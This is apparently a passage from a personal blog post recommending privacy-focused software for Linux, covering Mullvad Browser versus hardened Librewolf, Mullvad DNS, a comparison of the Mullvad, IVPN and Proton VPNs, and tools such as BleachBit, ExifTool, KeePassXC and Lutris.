Mullvad is essentially just the Tor browser minus the relays, making it much more usable on the daily and more private out of the box than Librewolf. I should note, however, that Librewolf updates faster than Tor/Mullvad, meaning that it has an easier time blending in with general Firefox traffic. Therefore, I'd either recommend Mullvad, or Librewolf with uBlock Origin, Port Authority, and Canvas Blocker, plus some settings tweaks. If you really want privacy but aren't very tech savvy, just go with Mullvad, but hardened Librewolf might be my preference. (And if you aren't a privacy nut, base Librewolf really isn't bad).

VPN/DNS

As mentioned for iOS, I would recommend using Mullvad's “base” DNS for slightly improved privacy + some ad and tracker blocking. You can refer to their website for how to set it up via Wi-Fi hardware settings or via browser settings. Both are fairly straightforward, though browser is certainly a bit quicker to setup. Nonetheless, I would recommend setting it up on your Wi-Fi, so your whole system gets the benefits.

As for VPNs, again, Mullvad, IVPN, and Proton VPN are the only real forerunners. I personally would not trust Proton all that much. Mullvad and IVPN are fairly similar as far as protocols go. IVPN has better split-tunneling, though, while Mullvad offers more devices on their basic plan (5 vs 3) and has better IPv6 and anti-censorship features. If you know you'll need a few apps to always be split-tunneled, I'd recommend IVPN, otherwise I'd recommend Mullvad. (And if you think you desperately need to use a VPN for something, probably just use Tor. VPNs are far from infallible).

Additional Software

BleachBit – The primary use of BleachBit is to clear space, with some secondary privacy gains. Namely, BleachBit clears data fragments, temporary files, and even (optionally) browser caches, saved passwords, etc. This can potentially clear several gigabytes of space, and the cleaning of data fragments ensures that deleted files are well and truly deleted.

ExifTool – A command-line utility to strip metadata from photos and videos. Would highly recommend using it before posting stuff publicly.

KeePassXC – My preferred password manager. Bitwarden may be a better pick if you want to sync passwords across devices, but KeePass is the goat for local password management.

Lutris – Not a privacy thing, but too handy for Linux not to mention. It lets you play all your games! It really integrates everything; you can manually add games in addition to linking all of the major game stores. With the built in compatibility/emulation tools, you can launch everything right from Lutris. Might require a little setup in some cases (particularly for manually added games), but honestly super functional.

 
Read more...